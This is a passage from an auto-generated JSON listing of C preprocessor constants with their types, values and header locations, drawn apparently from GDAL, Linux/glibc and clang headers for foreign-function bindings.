"__PTHREAD_COMPAT_PADDING_MID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SIZEOF_PTHREAD_BARRIERATTR_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:48:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "OGRNullFID", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:650:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_SIDD_UNIT_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:1571:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "OGRUnknownType", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:657:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "RTSIG_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "XATTR_LIST_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:17:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65536 }, { "tag": "const", "name": "XATTR_SIZE_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:16:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65536 }, { "tag": "const", "name": "XATTR_NAME_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "PIPE_BUF", "ns": 0, "location": "/usr/include/linux/limits.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "NAME_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:12:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "PATH_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:13:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "MAX_INPUT", "ns": 0, "location": "/usr/include/linux/limits.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "__MMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "MAX_CANON", "ns": 0, "location": "/usr/include/linux/limits.h:10:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "__IMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/immintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__LZCNTINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lzcntintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "NGROUPS_MAX", "ns": 0, "location": "/usr/include/linux/limits.h:7:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65536 }, { "tag": "const", "name": "_LINUX_LIMITS_H", "ns": 0, "location": "/usr/include/linux/limits.h:3:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__undef_LINK_MAX", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:393:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__PTHREAD_MUTEX_HAVE_PREV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:156:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "LONG_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9223372036854775807 }, { "tag": "const", "name": "HAVE_LOCALE_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:136:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "SSIZE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:169:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9223372036854775807 }, { "tag": "const", "name": "SEM_VALUE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:99:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483647 }, { "tag": "const", "name": "MQ_PRIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "HOST_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:93:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "__PTHREAD_SPINS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:100:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "LOGIN_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:90:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "__PTHREAD_SPINS_DATA", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:97:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__elision", "ns": 0, "location": "/tmp/tmpCFVK1AC1.tmp:405:43 <Spelling=/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:99:9>", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "const", "name": "TTY_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:87:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "DELAYTIMER_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483647 }, { "tag": "const", "name": "HAVE_POSIX_MEMALIGN", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:163:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "PTHREAD_STACK_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:81:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16384 }, { "tag": "const", "name": "HAVE_POSIX_SPAWNP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:166:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "AIO_PRIO_DELTA_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "HAVE_MMAP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:151:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_PNG_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:160:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_THREAD_THREADS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "HAVE_PCRE_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:157:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "PTHREAD_DESTRUCTOR_ITERATIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "HAVE_LZMA_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:145:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_THREAD_DESTRUCTOR_ITERATIONS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:67:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "HAVE_MEMORY_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:148:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__PTHREAD_RWLOCK_INT_FLAGS_SHARED", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:88:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_LONG_LONG", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:139:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__PTHREAD_RWLOCK_ELISION_EXTRA", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:82:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "PTHREAD_KEYS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:64:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "HAVE_LSTAT", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:142:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_THREAD_KEYS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/local_lim.h:62:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "_POSIX_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "HAVE_SC_PHYS_PAGES", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:193:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_NGROUPS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:78:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_POSIX_OPEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:85:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "HAVE_RLIMIT_AS", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:190:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_QHULL_LIBQHULL_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:181:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_MQ_OPEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:68:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_READLINK", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:187:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_PTHREAD_SPINLOCK", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:178:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_MQ_PRIO_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:71:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "HAVE_PTHREAD_MUTEX_RECURSIVE", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:175:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_MAX_CANON", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:61:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "_POSIX_MAX_INPUT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:65:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "_POSIX_LINK_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_PTHREAD_MUTEX_ADAPTIVE_NP", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:172:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_LOGIN_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:58:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "HAVE_PROJ_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:169:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_DELAYTIMER_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:48:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "HAVE_STRINGS_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:223:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_HOST_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "HAVE_STD_IS_NAN", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:220:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_STDINT_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:214:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_STDLIB_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:217:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_STATVFS64", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:211:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_STATVFS", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:208:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_SQL_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:205:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_SNPRINTF", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:199:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_SIGACTION", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:196:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_USELOCALE", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:250:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_CLOCKRES_MIN", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:157:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20000000 }, { "tag": "const", "name": "HAVE_UNISTD_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:247:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_UINTPTR_T", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:244:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_UINT128_T", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:241:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_TTY_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:135:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "_POSIX_TZNAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:139:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "HAVE_SYS_TYPES_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:238:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SYMLOOP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:129:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_SYS_STAT_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:235:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_TIMER_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:132:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "HAVE_STRTOULL", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:232:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_STREAM_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:122:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_STRTOF", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:229:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "HAVE_STRING_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:226:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SYMLINK_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:125:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "__WMMINTRIN_PCLMUL_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__wmmintrin_pclmul.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_SIGQUEUE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:116:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "LT_OBJDIR", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:278:9", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": ".libs/" }, { "tag": "const", "name": "ICONV_CPP_CONST", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:272:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_SSIZE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:119:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32767 }, { "tag": "const", "name": "ICONV_CONST", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:268:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_SEM_NSEMS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:110:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "_POSIX_SEM_VALUE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:113:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32767 }, { "tag": "const", "name": "__CLFLUSHOPTINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clflushoptintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_POSIX_RE_DUP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:104:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "HAVE_VSNPRINTF", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:262:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_RTSIG_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:107:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "HAVE_VPRINTF", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:259:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_PATH_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:97:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "HAVE_VFORK", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:256:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__have_pthread_attr_t", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:63:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_PIPE_BUF", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix1_lim.h:100:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "HAVE_VALUES_H", "ns": 0, "location": "/usr/include/gdal/cpl_config.h:253:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__BMIINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__RTMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__dev_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:60:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_XBEGIN_STARTED", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:17:9", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 }, "value": 4294967295 }, { "tag": "const", "name": "__gid_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:65:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__mode_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:70:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__nlink_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:75:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__uid_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:80:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__VPCLMULQDQINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/vpclmulqdqintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__id_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:104:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__pid_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:98:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__daddr_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:116:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__XTESTINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xtestintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__key_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:122:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__SHAINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/shaintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__clock_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__clockid_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_XABORT_CONFLICT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_XABORT_EXPLICIT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:18:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__time_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/time_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_XABORT_RETRY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_XABORT_CAPACITY", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:21:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__timer_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_XABORT_NESTED", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_XABORT_DEBUG", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/rtmintrin.h:22:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "_BITS_STDINT_INTN_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h:20:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__TBMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/tbmintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX2INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": 